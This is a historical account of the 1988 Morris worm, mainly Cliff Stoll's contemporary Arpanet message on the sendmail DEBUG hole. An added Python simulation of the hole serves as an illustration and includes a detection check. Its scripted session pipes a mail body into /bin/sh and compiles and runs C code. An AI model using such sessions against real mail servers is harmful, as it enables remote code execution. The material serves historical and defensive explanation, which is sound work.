 The Drama Unfolds

The following is a blow-by-blow description of what took place on Arpanet
on November 3, 1988, the day of the biggest virus scare to date.
These messages were captured directly from Arpanet!


Subject:  Virus on the Arpanet - Milnet
Date:  Thu, 3 Nov 88 06:46 EST

Re Arpanet "Sendmail" Virus attack November 3, 1988

Hi Gang!

It's now 3:45 AM on Wednesday 3 November 1988.  I'm tired, so don't believe
everything that follows...

Apparently, there is a massive attack on Unix systems going on right now.

I have spoken to systems managers at several computers, on both the east &
west coast, and I suspect this may be a system wide problem.

Symptom: hundreds or thousands of jobs start running on a Unix system
bringing response to zero.

Systems attacked: Unix systems, 4.3BSD unix & variants (eg: SUNs); any
sendmail compiled with debug has this problem.  See below.

This virus is spreading very quickly over the Milnet.  Within the past 4
hours, I have evidence that it has hit >10 sites across the country, both
Arpanet and Milnet sites.  I suspect that well over 50 sites have been hit.
Most of these are "major" sites and gateways.


Apparently, someone has written a program that uses a hole in SMTP Sendmail
utility.  This utility can send a message into another program.

Step 1: from a distant Milnet host, a message is sent to Sendmail to fire
up SED (SED is an editor).  This is possible in certain versions of sendmail
(see below).

2:  A 99 line C program is sent to SED through Sendmail.

3:  The distant computer sends a command to compile this C program.

4:  Several object files are copied into the Unix computer.
        There are 3 files:  one targeted to Sun
                            one targeted to SUN-3
                            one targeted to vax    (ultrix probably, not vms)

5:  The C program accepts as address other Milnet sites

6:  Apparently, program scans for other Milnet/arpanet addresses and
     repeats this process.

The bug in Sendmail:

When the Unix 4.3 BSD version of Sendmail is compiled with the Debug
option, there's a hole in it.

Most Unix systems (BSD 4.3 and Suns) apparently do not have this bug.
It exists only where the system manager recompiled Sendmail and enabled

This is bad news.

  Cliff Stoll dockmaster.arpa
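The following is an added illustration, not part of Cliff Stoll's message and not code from 4.3BSD sendmail: a toy SMTP state machine modelling the "sendmail compiled with debug" hole described above, run once as a binary built with DEBUG and once as one built without it. The SMTP reply strings, the `"|program"` recipient syntax, the `sed ... | /bin/sh` command line and the whole client session are assumptions constructed for the example; the message itself only says that sendmail was told to fire up sed and that a C program was then fed through it and compiled.

```python
# Added example: a toy model of the sendmail DEBUG hole, not the real sendmail.
# All reply codes, the program-recipient syntax and the client session below are
# assumptions constructed for illustration.
import re

# A recipient that names a program ("|cmd") instead of a mailbox.  Real
# sendmail only honours these from local aliases and .forward files; the
# modelled hole is that DEBUG mode lets a remote SMTP client supply one.
PROGRAM_RECIPIENT = re.compile(r'^\s*"?\|')


class ToySendmail:
    """Minimal SMTP responder; debug_compiled_in models a binary built with DEBUG."""

    def __init__(self, debug_compiled_in):
        self.debug_compiled_in = debug_compiled_in
        self.debug_mode = False
        self.recipients = []
        self.in_data = False
        self.data_lines = []
        self.delivered = []          # (recipient, body) pairs after DATA ends with "."

    def handle(self, line):
        """Process one client line; return the server reply, or None inside DATA."""
        if self.in_data:
            if line == ".":
                self.in_data = False
                body = "\n".join(self.data_lines)
                for rcpt in self.recipients:
                    self.delivered.append((rcpt, body))
                self.data_lines, self.recipients = [], []
                return "250 Ok"
            self.data_lines.append(line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            return "250 Hello"
        if verb == "DEBUG":
            if not self.debug_compiled_in:      # hardened build: verb does not exist
                return "500 Command unrecognized"
            self.debug_mode = True              # vulnerable build: remote peer now trusted
            return "200 Debug set"
        if verb == "MAIL":
            return "250 Sender ok"
        if verb == "RCPT":
            addr = arg.partition(":")[2].strip().strip("<>")
            if PROGRAM_RECIPIENT.match(addr) and not self.debug_mode:
                return "550 Program recipients are not accepted over SMTP"
            self.recipients.append(addr.strip('"'))
            return "250 Recipient ok"
        if verb == "DATA":
            if not self.recipients:
                return "503 Need RCPT first"
            self.in_data = True
            return '354 Enter mail, end with "."'
        if verb == "QUIT":
            return "221 Closing connection"
        return "500 Command unrecognized"


def run_session(server, client_lines):
    """Feed a scripted client to the server; return (client line, reply) pairs."""
    transcript = []
    for line in client_lines:
        reply = server.handle(line)
        if reply is not None:
            transcript.append((line, reply))
    return transcript


def piped_deliveries(server):
    """Message bodies that ended up handed to a program instead of a mailbox."""
    return [(r, b) for r, b in server.delivered if r.startswith("|")]


def session_is_suspicious(transcript):
    """Detection check: a DEBUG attempt plus a program recipient in one session."""
    tried_debug = any(c.upper().startswith("DEBUG") for c, _ in transcript)
    tried_pipe = any(c.upper().startswith("RCPT") and '"|' in c for c, _ in transcript)
    return tried_debug and tried_pipe


# Constructed session following steps 1-3 of the message: DEBUG, then a recipient
# that pipes the body through sed into a shell, then a body that writes and
# compiles a C bootstrap.  The exact command lines are assumptions.
ATTACK_SESSION = [
    "HELO distant.milnet.host",
    "DEBUG",
    "MAIL FROM:<nobody@distant.milnet.host>",
    "RCPT TO:<\"|sed '1,/^$/d' | /bin/sh\">",
    "DATA",
    "From: nobody@distant.milnet.host",
    "",
    "cat > /tmp/x.c <<'EOF'",
    "/* the 99-line C program would be here */",
    "EOF",
    "cc -o /tmp/x /tmp/x.c && /tmp/x",
    ".",
    "QUIT",
]


def simulate(debug_compiled_in):
    server = ToySendmail(debug_compiled_in)
    transcript = run_session(server, ATTACK_SESSION)
    return transcript, piped_deliveries(server)


if __name__ == "__main__":
    for flag in (True, False):
        transcript, piped = simulate(flag)
        print(f"--- sendmail compiled with DEBUG = {flag} ---")
        for client, reply in transcript:
            print(f"C: {client}\nS: {reply}")
        print("bodies handed to a program:", len(piped))
```

Against the DEBUG build the same session gets `250 Recipient ok` for the program recipient and the message body is handed to sed and the shell; against the build without DEBUG the verb is rejected and the program recipient gets a 550, so nothing is executed. The `session_is_suspicious` check flags the attempt in both cases, which is the behaviour a practitioner wants from a detector: it keys on the attacker's actions, not on whether they succeeded.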

